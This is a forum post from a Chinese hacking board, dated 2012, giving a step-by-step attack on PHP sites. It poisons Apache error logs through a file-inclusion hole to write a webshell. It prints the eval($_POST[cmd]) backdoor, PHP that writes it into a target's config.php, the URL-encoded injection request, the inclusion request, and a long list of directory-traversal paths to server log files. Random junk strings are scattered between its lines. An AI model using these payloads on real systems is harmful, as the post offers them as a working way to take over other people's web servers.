找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2041|回复: 0
打印 上一主题 下一主题

php包含apache日志写马

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:27:40 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
因为上面那个很不实际,我在测试中发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用,也比上面那种慢的要死好很多。
" P& P. @, C& \( p. d3 ]7 Q2 _0 T/ E( H# v5 j
比如还是这句一句话木马 6 u. E# I  m1 m1 d
<?eval($_POST[cmd]);?>   
! R" u% _5 l) ]# [% c! V/ ~; o5 y/ L" J0 @* A2 {3 b+ _
到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句, 4 J  J, ]1 U, B
fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是 0 D/ h+ g  y% Y. ~

7 z' J) h' m0 N$ Y, L<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>"); - S# i; n+ w. V
fclose($fp);?>   //在config.php里写入一句木马语句
. ?: ]+ z* E7 K  y: ?. m9 `- z; u2 y% b) z6 s
我们提交这句,再让Apache记录到错误日志里,再包含就成功写入shell,记得一定要转换成URL格式才成功。
) ~5 J& M2 P& b8 K9 R4 K6 Y& L转换为 . X+ g; L! ]/ D# R* A: ]
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
2 q; E( d6 \2 |3 [. Vconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
4 F4 {$ U" i7 s7 {%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B 2 {/ I% e3 q% h* l; N4 t2 p/ e/ S
fclose%28%24fp%29%3B%3F%3E ' S' S  K/ i3 `4 V5 {$ _2 ]
我们提交
( `$ e1 R- E$ Z: Ehttp://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww 5 k( M" K0 E9 a
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp 9 C: O1 b$ `* t. g* o, o
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
  l, F) w& o7 T) gcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
* r) f# A2 I) M6 t& g
; E* h2 p" {! C+ [  `6 X1 g4 {/ Q7 \这样就错误日志里就记录下了这行写入webshell的代码。 0 Z) p1 v" x9 y( U# e
我们再来包含日志,提交 6 J$ ?) l4 f) e1 T8 q- |: t0 u
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
1 f3 X$ Y" A" \0 c  Q( ?1 m/ M5 P2 j! i0 q  H+ \
这样webshell就写入成功了,config.php里就写入一句木马语句 * X8 Q- s( i) Z) E* H
OK. 0 \( l4 v  ?& c0 w- E! w
http://www.xxx.com/forum/config.php这个就成了我们的webshell
. _# p; e8 Z: G, p  v; D直接用lanker的客户端一连,主机就是你的了。 ! W, S- E% H( t" r0 t! G4 r
! n: G* \& h5 f6 w# c3 T0 U
PS:上面讲的,前提是文件夹权限必须可写 ,一定要-rwxrwxrwx(777)才能继续,这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用 3 d/ K$ [3 [/ R) E: ?
9 G& }/ Z5 ?) \) j( z2 S. T
其他的日志路径,你可以去猜,也可以参照这里。 ; D* P/ j( H. m2 Y0 J. L0 ]
../../../../../../../../../../var/log/httpd/access_log
$ `, Q+ M- P" F3 ~6 j6 s) v../../../../../../../../../../var/log/httpd/error_log
4 z$ }. O3 ?6 t) q. F. t' @../apache/logs/error.log
+ H$ [. p! t# s6 G0 P9 e7 w../apache/logs/access.log   _; L$ y# y9 I# x* u/ e$ h" a
../../apache/logs/error.log
$ u3 z- f. n  U" |: P../../apache/logs/access.log + ^, R/ \; ]" Y$ }
../../../apache/logs/error.log 2 p+ e) {8 A1 L' r
../../../apache/logs/access.log # O5 V  C) v; G2 Z6 F
../../../../../../../../../../etc/httpd/logs/acces_log
) L: h8 v$ B3 F) {4 L../../../../../../../../../../etc/httpd/logs/acces.log
2 `& z" p9 j0 ^2 ?$ f' Z5 `% C../../../../../../../../../../etc/httpd/logs/error_log
2 t3 e2 P0 [+ Q! y, y9 g) [../../../../../../../../../../etc/httpd/logs/error.log
6 c" c, w* Q/ l1 e; k../../../../../../../../../../var/www/logs/access_log : V; `' n- X1 a) ]2 y! b) _* y
../../../../../../../../../../var/www/logs/access.log 9 r* g5 R3 k- c: J1 W2 T
../../../../../../../../../../usr/local/apache/logs/access_log ) v( r" J9 r" l- v% J
../../../../../../../../../../usr/local/apache/logs/access.log
! x  P; S- z  R& S& E. c../../../../../../../../../../var/log/apache/access_log . A7 e2 }% N0 O. v1 W
../../../../../../../../../../var/log/apache/access.log * L/ H4 I" s2 A( E$ z$ `# O
../../../../../../../../../../var/log/access_log 8 I5 l. B0 R# o2 p
../../../../../../../../../../var/www/logs/error_log
! |+ s# i+ T3 d3 q" g8 y../../../../../../../../../../var/www/logs/error.log
$ T. }% G+ F( ^# u6 X- k0 G../../../../../../../../../../usr/local/apache/logs/error_log ; E, }- L% S! I! G+ ~% v
../../../../../../../../../../usr/local/apache/logs/error.log
$ D4 M; K7 P7 {# Q../../../../../../../../../../var/log/apache/error_log
9 {; x3 L+ F: W# p# d; k../../../../../../../../../../var/log/apache/error.log
# T  A$ g2 M3 ^../../../../../../../../../../var/log/access_log
* {1 Y. b$ A# a  f+ x  I  W6 b../../../../../../../../../../var/log/error_log
* s) e+ V! T+ r/var/log/httpd/access_log      
+ P6 m" K5 c. p9 Z: Y/var/log/httpd/error_log     
9 U# Y( w; e- r1 L( w6 {../apache/logs/error.log     
  s4 g3 T4 X0 w. D../apache/logs/access.log
* r- [, G1 J, X2 ~) I8 I../../apache/logs/error.log
2 q$ M+ y: V' Q- n' V/ S+ R../../apache/logs/access.log 6 o! y; Y. s4 ]' V0 g
../../../apache/logs/error.log
/ A2 F. e" p  k7 I9 Q../../../apache/logs/access.log   H  @4 l* V) n, s3 n6 C" R) }  v0 W
/etc/httpd/logs/acces_log
( z/ d( F( M! W2 ?6 y& m" W" S/etc/httpd/logs/acces.log # u4 B& g0 C  c' R
/etc/httpd/logs/error_log + A7 c9 [9 G) {7 n
/etc/httpd/logs/error.log 8 Z' k1 K7 ]' N" [
/var/www/logs/access_log
, d& V  M, f. o4 r& L6 K+ @& X- F/var/www/logs/access.log
5 E. p; |1 @0 F2 A9 P/usr/local/apache/logs/access_log
' {# Y/ o  t& G3 _4 D. n6 k/usr/local/apache/logs/access.log " z* n' i5 q# P' T2 f- P! T* n
/var/log/apache/access_log
$ D& J) O' {% W) p/var/log/apache/access.log
; c* x: _5 B& u3 u/var/log/access_log * S2 a9 w8 N6 C, v; L: A) o
/var/www/logs/error_log
  u0 s9 I% G2 p; N8 K3 k; _7 T/var/www/logs/error.log 1 y% k- B5 f9 A1 Z  Y6 a
/usr/local/apache/logs/error_log
- a  O9 ~* u. y0 t" E/usr/local/apache/logs/error.log : B) w7 k* s# F  \) {6 c- Z
/var/log/apache/error_log
' {, y* w% |4 V$ T* Z6 u- J. R/var/log/apache/error.log " @2 R3 m/ f! L7 B. z6 o) _+ X+ c+ M
/var/log/access_log
+ E; a! K& E. ?: }3 \  R; v/var/log/error_log
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表